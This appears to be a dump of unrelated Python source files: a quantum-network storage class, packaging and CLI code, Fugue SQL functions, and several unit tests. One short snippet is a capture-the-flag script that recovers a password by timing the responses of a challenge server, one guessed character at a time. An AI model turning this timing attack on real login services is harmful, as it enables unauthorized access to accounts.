"Internal Value Error, this storage mode does not exist.")
def reset_storage(self):
"""
Reset the quantum storage.
"""
for host in self._host_dict:
self.reset_qubits_from_host(host)
def release_storage(self):
"""
Releases all qubits in this storage. The storage is not
usable anymore after this function has been called.
"""
self.lock.acquire_write()
for q in self._qubit_dict.values():
for ele in q.values():
ele.release()
# do not release write, storage not usable anymore
def check_qubit_from_host_exists(self, from_host_id, purpose=None):
"""
Check if a qubit from a host exists in this quantum storage.
Args:
from_host_id (str): The host id of the host from which the qubit is from.
purpose (int): Optional, purpose of the qubit which should exist.
Returns:
(bool): True, if such a qubit is in the storage, false if not.
"""
self.lock.acquire_write()
if from_host_id not in self._host_dict:
self.lock.release_write()
return False
for q in self._host_dict[from_host_id]:
if self._check_qubit_in_system(q, from_host_id, purpose):
self.lock.release_write()
return True
self.lock.release_write()
return False
def get_qubit_by_id(self, q_id):
"""
Return the qubit that has the id *q_id*
Args:
q_id (str): The ID of the qubit
Returns:
(Qubit): The qubit with the id *q_id* or None if it does not exist
"""
if q_id in self._qubit_dict:
return list(self._qubit_dict[q_id].values())[0]
return None
def change_qubit_id(self, from_host_id, new_id, old_id=None):
"""
Changes the ID of a qubit. If the ID is not given, a random
qubit which is from a host is changed to the new id.
Args:
from_host_id (str): The ID of the owner
new_id (str): The ID to change to
old_id (str): The old ID
Returns:
(str): The new ID
"""
new_id = str(new_id)
self.lock.acquire_write()
if old_id is not None:
old_id = str(old_id)
qubit, purpose = self._pop_qubit_with_id_and_host_from_qubit_dict(
old_id, from_host_id)
if qubit is not None:
qubit.id = new_id
self._add_qubit_to_qubit_dict(qubit, purpose, from_host_id)
else:
if from_host_id in self._host_dict and self._host_dict[from_host_id]:
qubit = self._host_dict[from_host_id][0]
old_id = qubit.id
_, purpose = self._pop_qubit_with_id_and_host_from_qubit_dict(
old_id, from_host_id)
qubit.id = new_id
self._add_qubit_to_qubit_dict(qubit, purpose, from_host_id)
self.lock.release_write()
return old_id
def add_qubit_from_host(self, qubit, purpose, from_host_id):
"""
Adds a qubit which has been received from a host.
Args:
qubit (Qubit): qubit which should be stored.
from_host_id (str): Id of the Host from whom the qubit has
been received.
purpose (str): Purpose of the Qubit, for example EPR or data.
"""
self.lock.acquire_write()
if self._check_qubit_in_system(qubit, from_host_id, purpose=purpose):
self.logger.log("Qubit with id %s, purpose %s and from host %s"
" already in storage" % (qubit.id, purpose, from_host_id))
raise ValueError("Qubit with these parameters already in storage!")
if from_host_id not in self._host_dict:
self._add_new_host(from_host_id)
if not self._increase_qubit_counter(from_host_id):
qubit.release()
self.lock.release_write()
return
self._host_dict[from_host_id].append(qubit)
self._add_qubit_to_qubit_dict(qubit, purpose, from_host_id)
# Check if a Qubit of one of the callbacks has arrived
self._check_all_requests()
self.lock.release_write()
def get_all_qubits_from_host(self, from_host_id, purpose=None, remove=False):
"""
Get all Qubits from a specific host id.
These qubits are not removed from storage!
Args:
from_host_id (str): The host who the qubits are from
purpose (int): The purpose of the qubits
remove (bool): Also remove from storage
Returns:
(list): The list of qubits
"""
if from_host_id in self._host_dict:
out = []
self.lock.acquire_write()
flag = False
for q in self._host_dict[from_host_id]:
if self._check_qubit_in_system(q, from_host_id, purpose):
if not remove:
out.append(q)
else:
flag = True
if remove:
break
if not flag and remove:
num_qubits = len(self._host_dict[from_host_id])
for _ in range(num_qubits):
out.append(self._get_qubit_from_host(from_host_id, purpose=purpose))
self.lock.release_write()
return out
return []
def reset_qubits_from_host(self, from_host_id, purpose=None):
"""
Remove all stored qubits from the host *from_host_id*.
Args:
from_host_id (str): The host who the qubits are from
purpose (int):
"""
self.lock.acquire_write()
if from_host_id in self._host_dict:
for q in self._host_dict[from_host_id]:
if self._check_qubit_in_system(q, from_host_id, purpose):
self._get_qubit_from_host(from_host_id, purpose=purpose)
self.lock.release_write()
def _check_all_requests(self):
"""
Checks if any of the pending requests is now fulfilled.
Returns:
If a request is fulfilled, the request is handled and the function
returns the qubit of this request.
"""
for req_id, args in self._pending_request_dict.items():
ret = self._get_qubit_from_host(args[1], args[2], args[3])
if ret is not None:
args[0].put(ret)
self._remove_request(req_id)
return ret
def _add_request(self, args):
"""
Adds a new request to the quantum storage. If a new qubit arrives, it
is checked if the request for the qubit is satisfied.
Args:
args (list): [Queue, from_host_id, q_id, purpose]
"""
self._pending_request_dict[self._request_id] = args
self._request_id += 1
self._amount_pending_requests += 1
return self._request_id
def _remove_request(self, req_id):
"""
Removes a pending request from the request dict.
Args:
req_id (int): The id of the request to remove.
"""
if req_id in self._pending_request_dict:
del self._pending_request_dict[req_id]
self._amount_pending_requests -= 1
def get_qubit_from_host(self, from_host_id, q_id=None, purpose=None, wait=0):
"""
Returns next qubit which has been received from a host. If the qubit has
not been receives yet, the thread is blocked for a maxiumum of the wait time,
till the qubit arrives (The default is 0). If the id is given, the exact qubit with the id
is returned, or None if it does not exist.
The qubit is removed from the quantum storage.
Args:
from_host_id (str): Host id from who the qubit has been received.
q_id (str): Optional Id, to return the exact qubit with the Id.
purpose (str): Optional, purpose of the Qubit.
wait (int): Default is 0. The maximum blocking time. -1 if blocking forever.
Returns:
(bool): If such a qubit exists, it returns the qubit. Otherwise, None
is returned.
"""
# Block forever if wait is -1
if wait == -1:
wait = None
self.lock.acquire_write()
ret = self._get_qubit_from_host(from_host_id, q_id, purpose)
if ret is not None or wait == 0:
self.lock.release_write()
return ret
q = queue.Queue()
args = [q, from_host_id, q_id, purpose]
req_id = self._add_request(args)
self.lock.release_write()
ret = None
try:
ret = q.get(timeout=wait)
except queue.Empty:
pass
if ret is None:
self.lock.acquire_write()
self._remove_request(req_id)
self.lock.release_write()
return ret
def _get_qubit_from_host(self, from_host_id, q_id=None, purpose=None):
if q_id is not None:
qubit = self._pop_qubit_with_id_and_host_from_qubit_dict(
q_id, from_host_id, purpose=purpose)
if qubit is not None:
qubit, purp = qubit
if from_host_id not in self._host_dict or \
qubit not in self._host_dict[from_host_id]:
# Qubit with the ID exists, but does not belong to the host requested
self._add_qubit_to_qubit_dict(qubit, purp, from_host_id)
return None
self._host_dict[from_host_id].remove(qubit)
self._decrease_qubit_counter(from_host_id)
return qubit
if from_host_id not in self._host_dict:
return None
if self._host_dict[from_host_id]:
# check purposes of all qubits
for _ in range(len(self._host_dict[from_host_id])):
qubit = self._host_dict[from_host_id].pop(0)
out = self._pop_qubit_with_id_and_host_from_qubit_dict(
qubit.id, from_host_id, purpose=purpose)
if out is not None:
self._decrease_qubit_counter(from_host_id)
return out[0]
self._host_dict[from_host_id].append(qubit)
return None
def _pop_qubit_with_id_and_host_from_qubit_dict(self, q_id, from_host_id, purpose=None):
def _pop_purpose_from_purpose_dict():
nonlocal q_id, from_host_id
if q_id not in self._purpose_dict:
return None
pur = self._purpose_dict[q_id].pop(from_host_id, None)
if pur is not None:
if not self._purpose_dict[q_id]:
del self._purpose_dict[q_id]
return pur
return None
purp = _pop_purpose_from_purpose_dict()
if purp is not None:
if purpose is None or purpose == purp:
qubit = self._qubit_dict[q_id].pop(from_host_id, None)
if qubit is not None:
if not self._qubit_dict[q_id]:
del self._qubit_dict[q_id]
return qubit, purp
else:
if q_id not in self._purpose_dict:
self._purpose_dict[q_id] = {}
self._purpose_dict[q_id][from_host_id] = purp
return None
def _add_qubit_to_qubit_dict(self, qubit, purpose, from_host_id):
def _add_purpose_to_purpose_dict(q_id):
nonlocal purpose, from_host_id
if q_id not in self._purpose_dict:
self._purpose_dict[q_id] = {}
self._purpose_dict[q_id][from_host_id] = purpose
if qubit.id not in self._qubit_dict:
self._qubit_dict[qubit.id] = {}
self._qubit_dict[qubit.id][from_host_id] = qubit
_add_purpose_to_purpose_dict(qubit.id)
def _add_new_host(self, host_id):
if host_id not in self._host_dict:
self._host_dict[host_id] = []
if host_id not in self._storage_limits_per_host:
self._storage_limits_per_host[host_id] = self._default_storage_limit_per_host
self._amount_qubits_stored_per_host[host_id] = 0
def _check_qubit_in_system(self, qubit, from_host_id, purpose=None):
"""
True if qubit with same parameters already in the systems
Args:
qubit (Qubit): The qubit in question
from_host_id (str): The ID of the sending host
purpose (int): Qubit's purpose
Returns:
(bool): If the qubit is in the system.
"""
if qubit.id in self._qubit_dict and \
from_host_id in self._qubit_dict[qubit.id]:
if purpose is None or (purpose == self._purpose_dict[qubit.id][from_host_id]):
return True
return False
def _check_memory_limits(self, host_id):
"""
Checks if another qubit can be added to the storage.
Args:
host_id (str): The host_id the qubit should be added to.
Returns:
True if no storage limit has been reached, False if a memory
limit has occurred.
"""
if self._storage_mode == QuantumStorage.STORAGE_LIMIT_ALL:
if self._storage_limit == -1:
return True
if self._storage_limit <= self._amount_qubit_stored:
return False
else:
return True
elif self._storage_mode == QuantumStorage.STORAGE_LIMIT_PER_HOST:
if self._storage_limit == -1:
return True
if self._storage_limit <= self._amount_qubits_stored_per_host[host_id]:
return False
else:
return True
elif self._storage_mode == QuantumStorage.STORAGE_LIMIT_INDIVIDUALLY_PER_HOST:
if self._storage_limits_per_host[host_id] == -1:
return True
if self._storage_limits_per_host[host_id] <= self._amount_qubits_stored_per_host[host_id]:
return False
else:
return True
else:
raise ValueError(
"Internal Value Error, this storage mode does not exist.")
def _increase_qubit_counter(self, host_id):
"""
Checks if the qubit counter can be increased, because of memory limits,
and increases the counter.
Args:
host_id (str): From who the qubit comes from.
Returns:
True, if the counter could be increased, False if not.
"""
if not self._check_memory_limits(host_id):
return False
self._amount_qubits_stored_per_host[host_id] += 1
self._amount_qubit_stored += 1
return True
def _reset_qubit_counter(self, host_id):
"""
Args:
host_id (str):
Returns:
(bool): True, if the counter could be decreased, False if not.
"""
if self._amount_qubits_stored_per_host[host_id] <= 0 or \
self._amount_qubit_stored <= 0:
return False
num_qubits = self._amount_qubits_stored_per_host[host_id]
self._amount_qubits_stored_per_host[host_id] = 0
self._amount_qubit_stored -= num_qubits
def _decrease_qubit_counter(self, host_id):
"""
Checks if the qubit counter can be decreased
and decreases the counter.
Args:
host_id (str): From who the qubit comes from.
Returns:
(bool): True, if the counter could be decreased, False if not.
"""
if self._amount_qubits_stored_per_host[host_id] <= 0 or \
self._amount_qubit_stored <= 0:
return False
self._amount_qubits_stored_per_host[host_id] -= 1
self._amount_qubit_stored -= 1
|
23220
|
import os
def check(cmd, mf):
m = mf.findNode('matplotlib')
if m is None or m.filename is None:
return None
if cmd.matplotlib_backends:
backends = {}
for backend in cmd.matplotlib_backends:
if backend == '-':
pass
elif backend == '*':
mf.import_hook('matplotlib.backends', m, ['*'])
else:
mf.import_hook('matplotlib.backends.backend_%s' % (
backend,), m)
else:
backends = {'packages': ['matplotlib']}
return dict(
prescripts=['py2app.recipes.matplotlib_prescript'],
resources=[os.path.join(os.path.dirname(m.filename), 'mpl-data')],
**backends
)
|
23271
|
import os
import nibabel as nb
import numpy as np
from django.test import TestCase
from neurovault.apps.statmaps.models import BaseStatisticMap
from neurovault.apps.statmaps.utils import is_thresholded, infer_map_type
class QATest(TestCase):
def setUp(self):
this_path = os.path.abspath(os.path.dirname(__file__))
self.brain = nb.load(os.path.join(this_path, "../static", "anatomical", "MNI152.nii.gz"))
self.roi_map = nb.load(os.path.join(this_path, "test_data", "statmaps", "WA3.nii.gz"))
self.parcellation = nb.load(os.path.join(this_path, "test_data", "TTatlas.nii.gz"))
# We will fill in brain mask with this percentage of randomly placed values
self.ratios = [0.0,0.1,0.15,0.2,0.25,0.3,0.4,0.5,0.6,0.96, 0.98]
self.thresholded = [False,False,False,False,False,False,False,False,False,True,True]
def testThresholded(self):
for p,t in zip(self.ratios, self.thresholded):
empty_data = np.ones(self.brain.shape)
if p != 0.0:
number_voxels = int(np.floor(p * empty_data.size))
random_idx = np.random.choice(range(empty_data.size), number_voxels, replace=False)
empty_data[np.unravel_index(random_idx, empty_data.shape)] = 0
empty_nii = nb.Nifti1Image(empty_data,affine=self.brain.get_affine(),header=self.brain.get_header())
is_thr, ratio_bad = is_thresholded(nii_obj=empty_nii)
print "Zeroed %s of values, is_thresholded returns [%s:%s]" %(p,is_thr,ratio_bad)
self.assertAlmostEqual(p, ratio_bad, delta=0.001)
self.assertEquals(t, is_thr)
def testInferMapType(self):
self.assertEquals(infer_map_type(self.roi_map), BaseStatisticMap.R)
self.assertEquals(infer_map_type(self.parcellation), BaseStatisticMap.Pa)
self.assertEquals(infer_map_type(self.brain), BaseStatisticMap.OTHER)
|
23273
|
from typing import Any, Optional
import pyarrow as pa
from fugue.column.expressions import (
ColumnExpr,
_FuncExpr,
_to_col,
function,
)
from triad import Schema
def coalesce(*args: Any) -> ColumnExpr:
"""SQL ``COALESCE`` function
:param args: If a value is not :class:`~fugue.column.expressions.ColumnExpr`
then it's converted to a literal column by
:func:`~fugue.column.expressions.col`
.. note::
this function can infer neither type nor alias
.. admonition:: New Since
:class: hint
**0.6.0**
.. admonition:: Examples
.. code-block:: python
import fugue.column.functions as f
f.coalesce(col("a"), col("b")+col("c"), 1)
"""
return function("COALESCE", *[_to_col(x) for x in args])
def min(col: ColumnExpr) -> ColumnExpr: # pylint: disable=redefined-builtin
"""SQL ``MIN`` function (aggregation)
:param col: the column to find min
.. note::
* this function can infer type from ``col`` type
* this function can infer alias from ``col``'s inferred alias
.. admonition:: New Since
:class: hint
**0.6.0**
.. admonition:: Examples
.. code-block:: python
import fugue.column.functions as f
# assume col a has type double
f.min(col("a")) # CAST(MIN(a) AS double) AS a
f.min(-col("a")) # CAST(MIN(-a) AS double) AS a
# neither type nor alias can be inferred in the following cases
f.min(col("a")+1)
f.min(col("a")+col("b"))
# you can specify explicitly
# CAST(MIN(a+b) AS int) AS x
f.min(col("a")+col("b")).cast(int).alias("x")
"""
assert isinstance(col, ColumnExpr)
return _SameTypeUnaryAggFuncExpr("MIN", col)
def max(col: ColumnExpr) -> ColumnExpr: # pylint: disable=redefined-builtin
"""SQL ``MAX`` function (aggregation)
:param col: the column to find max
.. note::
* this function can infer type from ``col`` type
* this function can infer alias from ``col``'s inferred alias
.. admonition:: New Since
:class: hint
**0.6.0**
.. admonition:: Examples
.. code-block:: python
import fugue.column.functions as f
# assume col a has type double
f.max(col("a")) # CAST(MAX(a) AS double) AS a
f.max(-col("a")) # CAST(MAX(-a) AS double) AS a
# neither type nor alias can be inferred in the following cases
f.max(col("a")+1)
f.max(col("a")+col("b"))
# you can specify explicitly
# CAST(MAX(a+b) AS int) AS x
f.max(col("a")+col("b")).cast(int).alias("x")
"""
assert isinstance(col, ColumnExpr)
return _SameTypeUnaryAggFuncExpr("MAX", col)
def count(col: ColumnExpr) -> ColumnExpr:
"""SQL ``COUNT`` function (aggregation)
:param col: the column to find count
.. note::
* this function cannot infer type from ``col`` type
* this function can infer alias from ``col``'s inferred alias
.. admonition:: New Since
:class: hint
**0.6.0**
.. admonition:: Examples
.. code-block:: python
import fugue.column.functions as f
f.count(col("*")) # COUNT(*)
f.count(col("a")) # COUNT(a) AS a
# you can specify explicitly
# CAST(COUNT(a) AS double) AS a
f.count(col("a")).cast(float)
"""
assert isinstance(col, ColumnExpr)
return _UnaryAggFuncExpr("COUNT", col)
def count_distinct(col: ColumnExpr) -> ColumnExpr:
"""SQL ``COUNT DISTINCT`` function (aggregation)
:param col: the column to find distinct element count
.. note::
* this function cannot infer type from ``col`` type
* this function can infer alias from ``col``'s inferred alias
.. admonition:: New Since
:class: hint
**0.6.0**
.. admonition:: Examples
.. code-block:: python
import fugue.column.functions as f
f.count_distinct(col("*")) # COUNT(DISTINCT *)
f.count_distinct(col("a")) # COUNT(DISTINCT a) AS a
# you can specify explicitly
# CAST(COUNT(DISTINCT a) AS double) AS a
f.count_distinct(col("a")).cast(float)
"""
assert isinstance(col, ColumnExpr)
return _UnaryAggFuncExpr("COUNT", col, arg_distinct=True)
def avg(col: ColumnExpr) -> ColumnExpr:
"""SQL ``AVG`` function (aggregation)
:param col: the column to find average
.. note::
* this function cannot infer type from ``col`` type
* this function can infer alias from ``col``'s inferred alias
.. admonition:: New Since
:class: hint
**0.6.0**
.. admonition:: Examples
.. code-block:: python
import fugue.column.functions as f
f.avg(col("a")) # AVG(a) AS a
# you can specify explicitly
# CAST(AVG(a) AS double) AS a
f.avg(col("a")).cast(float)
"""
assert isinstance(col, ColumnExpr)
return _UnaryAggFuncExpr("AVG", col)
def sum(col: ColumnExpr) -> ColumnExpr: # pylint: disable=redefined-builtin
"""SQL ``SUM`` function (aggregation)
:param col: the column to find sum
.. note::
* this function cannot infer type from ``col`` type
* this function can infer alias from ``col``'s inferred alias
.. admonition:: New Since
:class: hint
**0.6.0**
.. admonition:: Examples
.. code-block:: python
import fugue.column.functions as f
f.sum(col("a")) # SUM(a) AS a
# you can specify explicitly
# CAST(SUM(a) AS double) AS a
f.sum(col("a")).cast(float)
"""
assert isinstance(col, ColumnExpr)
return _UnaryAggFuncExpr("SUM", col)
def first(col: ColumnExpr) -> ColumnExpr:
"""SQL ``FIRST`` function (aggregation)
:param col: the column to find first
.. note::
* this function can infer type from ``col`` type
* this function can infer alias from ``col``'s inferred alias
.. admonition:: New Since
:class: hint
**0.6.0**
.. admonition:: Examples
.. code-block:: python
import fugue.column.functions as f
# assume col a has type double
f.first(col("a")) # CAST(FIRST(a) AS double) AS a
f.first(-col("a")) # CAST(FIRST(-a) AS double) AS a
# neither type nor alias can be inferred in the following cases
f.first(col("a")+1)
f.first(col("a")+col("b"))
# you can specify explicitly
# CAST(FIRST(a+b) AS int) AS x
f.first(col("a")+col("b")).cast(int).alias("x")
"""
assert isinstance(col, ColumnExpr)
return _SameTypeUnaryAggFuncExpr("FIRST", col)
def last(col: ColumnExpr) -> ColumnExpr:
"""SQL ``LAST`` function (aggregation)
:param col: the column to find last
.. note::
* this function can infer type from ``col`` type
* this function can infer alias from ``col``'s inferred alias
.. admonition:: New Since
:class: hint
**0.6.0**
.. admonition:: Examples
.. code-block:: python
import fugue.column.functions as f
# assume col a has type double
f.last(col("a")) # CAST(LAST(a) AS double) AS a
f.last(-col("a")) # CAST(LAST(-a) AS double) AS a
# neither type nor alias can be inferred in the following cases
f.last(col("a")+1)
f.last(col("a")+col("b"))
# you can specify explicitly
# CAST(LAST(a+b) AS int) AS x
f.last(col("a")+col("b")).cast(int).alias("x")
"""
assert isinstance(col, ColumnExpr)
return _SameTypeUnaryAggFuncExpr("LAST", col)
def is_agg(column: Any) -> bool:
"""Check if a column contains aggregation operation
:param col: the column to check
:return: whether the column is :class:`~fugue.column.expressions.ColumnExpr`
and contains aggregation operations
.. admonition:: New Since
:class: hint
**0.6.0**
.. admonition:: Examples
.. code-block:: python
import fugue.column.functions as f
assert not f.is_agg(1)
assert not f.is_agg(col("a"))
assert not f.is_agg(col("a")+lit(1))
assert f.is_agg(f.max(col("a")))
assert f.is_agg(-f.max(col("a")))
assert f.is_agg(f.max(col("a")+1))
assert f.is_agg(f.max(col("a"))+f.min(col("a"))))
"""
if isinstance(column, _UnaryAggFuncExpr):
return True
if isinstance(column, _FuncExpr):
return any(is_agg(x) for x in column.args) or any(
is_agg(x) for x in column.kwargs.values()
)
return False
class _UnaryAggFuncExpr(_FuncExpr):
def __init__(self, func: str, col: ColumnExpr, arg_distinct: bool = False):
super().__init__(func, col, arg_distinct=arg_distinct)
def infer_alias(self) -> ColumnExpr:
return (
self
if self.output_name != ""
else self.alias(self.args[0].infer_alias().output_name)
)
def _copy(self) -> _FuncExpr:
return _UnaryAggFuncExpr(self.func, *self.args, **self.kwargs)
class _SameTypeUnaryAggFuncExpr(_UnaryAggFuncExpr):
def _copy(self) -> _FuncExpr:
return _SameTypeUnaryAggFuncExpr(self.func, *self.args, **self.kwargs)
def infer_type(self, schema: Schema) -> Optional[pa.DataType]:
return self.as_type or self.args[0].infer_type(schema)
|
23285
|
import unittest
from minos.common import (
MinosException,
)
from minos.networks import (
MinosNetworkException,
)
class TestExceptions(unittest.TestCase):
def test_type(self):
self.assertTrue(issubclass(MinosNetworkException, MinosException))
if __name__ == "__main__":
unittest.main()
|
23288
|
import os
import numpy as np
import tensorflow as tf
from models.config import Config
from models.memory_gan import MemoryGAN
from models.test_generation import test_generation
from models.train import train
from utils import pp, visualize, to_json
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
flags = tf.app.flags
flags.DEFINE_integer("epoch", 1500, "Max epoch to train")
flags.DEFINE_string("exp", 0, "Experiment number")
flags.DEFINE_string("load_cp_dir", '', "cp path")
flags.DEFINE_string("dataset", "fashion", "[fashion, affmnist, cifar10]")
flags.DEFINE_string("loss", "jsd", "[jsd, alternative, reverse_kl, updown]")
flags.DEFINE_boolean("lr_decay", False, "")
flags.DEFINE_boolean("use_augmentation", False, "")
flags.DEFINE_boolean("is_train", True, "True for training, False for testing [False]")
flags.DEFINE_string("model", 'MemoryGAN', '')
flags.DEFINE_string("generator", 'base_g', '')
flags.DEFINE_string("discriminator", 'memory_d', '')
FLAGS = flags.FLAGS
def main(_):
pp.pprint(flags.FLAGS.__flags)
config = Config(FLAGS)
config.print_config()
config.make_dirs()
config_proto = tf.ConfigProto(allow_soft_placement=FLAGS.is_train, log_device_placement=False)
config_proto.gpu_options.allow_growth = True
with tf.Session(config=config_proto) as sess:
model = globals()[FLAGS.model](config)
if not FLAGS.is_train:
test_generation(model, sess)
else:
train(model, sess)
if __name__ == '__main__':
tf.app.run()
|
23304
|
from recipe_compiler.recipe import Recipe
from recipe_compiler.recipe_category import RecipeCategory
def test_recipe_slug():
# Given
name = "<NAME>"
residence = "Seattle, WA"
category = RecipeCategory("dessert")
recipe_name = '"Pie" Shell Script'
quote = "Hello, World"
ingredients = [""]
instructions = [""]
expected = "pie-shell-script"
# When
recipe = Recipe(
name, residence, category, recipe_name, quote, ingredients, instructions
)
# Then
assert expected == recipe.slug
|
23315
|
import requests
text = "0123456789abcdefghijklmnopqrstuvwxyz_}"
flag = "hsctf{"
for _ in range(30):
time = [0.1 for _ in range(38)]
for _ in range(5):
for i in range(38):
payload = {"password": flag + text[i]}
r = requests.post(
"https://networked-password.web.chal.hsctf.com", data=payload
)
response_time = r.elapsed.total_seconds()
time[i] += response_time
print(payload, " response time : ", response_time)
flag += text[time.index(max(time))]
print("flag is ", flag)
|
23327
|
from __future__ import absolute_import
import argparse
import logging
import multiprocessing
import os
import sys
import uuid
from os.path import join, exists
import yaml
from phigaro.context import Context
from phigaro.batch.runner import run_tasks_chain
from phigaro.batch.task.path import sample_name
from phigaro.batch.task.prodigal import ProdigalTask
from phigaro.batch.task.hmmer import HmmerTask
from phigaro.batch.task.dummy import DummyTask
from phigaro.batch.task.preprocess import PreprocessTask
from phigaro.batch.task.run_phigaro import RunPhigaroTask
from phigaro._version import __version__
def parse_substitute_output(subs):
subs = subs or []
res = {}
for sub in subs:
task_name, output = sub.split(":")
res[task_name] = DummyTask(output, task_name)
return res
def create_task(substitutions, task_class, *args, **kwargs):
# TODO: refactor to class Application
task = task_class(*args, **kwargs)
if task.task_name in substitutions:
print(
'Substituting output for {}: {}'.format(
task.task_name, substitutions[task.task_name].output()
)
)
return substitutions[task.task_name]
return task
def clean_fold():
is_empty = True
for root, dirs, files in os.walk('proc', topdown=False):
for name in files:
is_empty = False
break
if is_empty:
for name in dirs:
os.rmdir(os.path.join(root, name))
if is_empty:
os.rmdir('proc')
def main():
default_config_path = join(os.getenv('HOME'), '.phigaro', 'config.yml')
parser = argparse.ArgumentParser(
prog='phigaro',
description='Phigaro is a scalable command-line tool for predictions phages and prophages '
'from nucleid acid sequences',
)
parser.add_argument(
'-V',
'--version',
action='version',
version='%(prog)s {version}'.format(version=__version__),
)
parser.add_argument(
'-f',
'--fasta-file',
help='Assembly scaffolds/contigs or full genomes, required',
required=True,
)
parser.add_argument(
'-c',
'--config',
default=default_config_path,
help='Path to the config file, not required. The deafult is %s'%default_config_path,
)
parser.add_argument(
'-v', '--verbose', action='store_true', help=argparse.SUPPRESS
)
parser.add_argument(
'-p',
'--print-vogs',
help='Print phage vogs for each region',
action='store_true',
)
parser.add_argument(
'-e',
'--extension',
default=['html'],
nargs='+',
help='Type of the output: html, tsv, gff, bed or stdout. Default is html. You can specify several file formats with a space as a separator. Example: -e tsv html stdout.',
)
parser.add_argument(
'-o',
'--output',
default='',
help='Output filename for html and txt outputs. Required by default, but not required for stdout only output.',
)
parser.add_argument(
'--not-open',
help='Do not open html file automatically, if html output type is specified.',
action='store_true',
)
parser.add_argument(
'-t',
'--threads',
type=int,
default=multiprocessing.cpu_count(),
help='Num of threads ('
'default is num of CPUs={})'.format(multiprocessing.cpu_count()),
)
parser.add_argument(
'--no-cleanup', action='store_true', help="Do not delete any temporary files that was generated by Phigaro (HMMER & Prodigal outputs and some others)."
)
parser.add_argument(
'-S',
'--substitute-output',
action='append',
help='If you have precomputed prodigal and/or hmmer data you can provide paths to the files in the following format: program:address/to/the/file. In place of program you should write hmmer or prodigal. If you need to provide both files you should pass them separetely as two parametres.',
)
parser.add_argument(
'--save-fasta',
action='store_true',
help='Save all phage fasta sequences in a fasta file.',
)
parser.add_argument(
'-d',
'--delete-shorts',
action='store_true',
help='Exclude sequences with length < 20000 automatically.',
)
parser.add_argument(
'-m',
'--mode',
default='basic',
help='You can launch Phigaro at one of 3 modes: basic, abs, without_gc. Default is basic. Read more about modes at https://github.com/bobeobibo/phigaro/',
)
parser.add_argument(
'--wtp',
action='store_true',
help=argparse.SUPPRESS
)
args = parser.parse_args()
logging.basicConfig(level=logging.INFO if args.verbose else logging.WARN)
logging.getLogger('sh.command').setLevel(logging.WARN)
logger = logging.getLogger(__name__)
if not exists(args.config):
# TODO: pretty message
print('Please, create config file using phigaro-setup script')
exit(1)
args.extension = [atype.lower() for atype in args.extension]
for ext in args.extension:
if ext not in ['html', 'gff', 'bed', 'tsv', 'stdout']:
print(
'Error! The unknown output format in -e/--extensionn parameter: %s. Please, choose one or several from the list: html, gff, bed, tsv, stdout'%ext
)
exit(1)
if (args.output == '') and (args.extension != ['stdout']):
print(
'Error! Argument -o/--output is required or change the type of the output to stdout.'
)
exit(1)
with open(args.config) as f:
logger.info('Using config file: {}'.format(args.config))
config = yaml.load(f, Loader=yaml.FullLoader)
config['phigaro']['wtp'] = args.wtp
config['phigaro']['print_vogs'] = args.print_vogs
config['phigaro']['filename'] = args.fasta_file
config['phigaro']['no_html'] = (
True if 'html' not in args.extension else False
)
config['phigaro']['not_open'] = args.not_open
config['phigaro']['output'] = (args.output+'/'+os.path.splitext(os.path.basename(args.fasta_file))[0]+'.phigaro').replace('//', '/')
config['phigaro']['uuid'] = uuid.uuid4().hex
config['phigaro']['delete_shorts'] = args.delete_shorts
config['phigaro']['gff'] = True if ('gff' in args.extension) else False
config['phigaro']['bed'] = True if ('bed' in args.extension) else False
config['phigaro']['mode'] = args.mode
config['phigaro']['save_fasta'] = args.save_fasta
filename = args.fasta_file
sample = '{}-{}'.format(sample_name(filename), config['phigaro']['uuid'])
if args.wtp:
config['phigaro']['not_open'] = True
config['phigaro']['gff'] = True
config['phigaro']['bed'] = True
args.extension.append('tsv')
config['phigaro']['delete_shorts'] = True
config['phigaro']['print_vogs'] = True
config['phigaro']['output_wtp'] = args.output + '/phigaro.txt'
config['phigaro']['output'] = args.output +'/phigaro/phigaro'
config['phigaro']['save_fasta'] = True
if config['phigaro']['output'] != '':
fold = os.path.dirname(config['phigaro']['output'])
if fold and not os.path.isdir(fold):
os.makedirs(fold)
if args.wtp:
fold = os.path.dirname(config['phigaro']['output_wtp'])
if fold and not os.path.isdir(fold):
os.makedirs(fold)
Context.initialize(
sample=sample, config=config, threads=args.threads,
)
substitutions = parse_substitute_output(args.substitute_output)
preprocess_task = create_task(substitutions, PreprocessTask, filename)
prodigal_task = create_task(
substitutions, ProdigalTask, preprocess_task=preprocess_task
)
hmmer_task = create_task(
substitutions, HmmerTask, prodigal_task=prodigal_task
)
run_phigaro_task = create_task(
substitutions,
RunPhigaroTask,
prodigal_task=prodigal_task,
hmmer_task=hmmer_task,
)
tasks = [preprocess_task, prodigal_task, hmmer_task, run_phigaro_task]
task_output_file = run_tasks_chain(tasks)
if ('tsv' in args.extension) or ('stdout' in args.extension):
with open(task_output_file) as f:
f = list(f)
if 'tsv' in args.extension:
out_f = open(config['phigaro']['output'] + '.tsv', 'w')
for line in f:
out_f.write(line)
if 'stdout' in args.extension:
out_f = sys.stdout
for line in f:
out_f.write(line)
out_f.close()
if not args.no_cleanup:
for t in tasks:
t.clean()
clean_fold()
if __name__ == '__main__':
main()
|
23374
|
import unittest
import uuid
from memory.client import MemoryClient
from hailtop.aiocloud.aiogoogle import GoogleStorageAsyncFS
from hailtop.config import get_user_config
from hailtop.utils import async_to_blocking
from gear.cloud_config import get_gcp_config
PROJECT = get_gcp_config().project
class BlockingMemoryClient:
def __init__(self, gcs_project=None, fs=None, deploy_config=None, session=None, headers=None, _token=None):
self._client = MemoryClient(gcs_project, fs, deploy_config, session, headers, _token)
async_to_blocking(self._client.async_init())
def _get_file_if_exists(self, filename):
return async_to_blocking(self._client._get_file_if_exists(filename))
def read_file(self, filename):
return async_to_blocking(self._client.read_file(filename))
def write_file(self, filename, data):
return async_to_blocking(self._client.write_file(filename, data))
def close(self):
return async_to_blocking(self._client.close())
class Tests(unittest.TestCase):
def setUp(self):
bucket_name = get_user_config().get('batch', 'bucket')
token = uuid.uuid4()
self.test_path = f'gs://{bucket_name}/memory-tests/{token}'
self.fs = GoogleStorageAsyncFS(project=PROJECT)
self.client = BlockingMemoryClient(fs=self.fs)
self.temp_files = set()
def tearDown(self):
async_to_blocking(self.fs.rmtree(None, self.test_path))
self.client.close()
async def add_temp_file_from_string(self, name: str, str_value: bytes):
handle = f'{self.test_path}/{name}'
async with await self.fs.create(handle) as f:
await f.write(str_value)
return handle
def test_non_existent(self):
for _ in range(3):
self.assertIsNone(self.client._get_file_if_exists(f'{self.test_path}/nonexistent'))
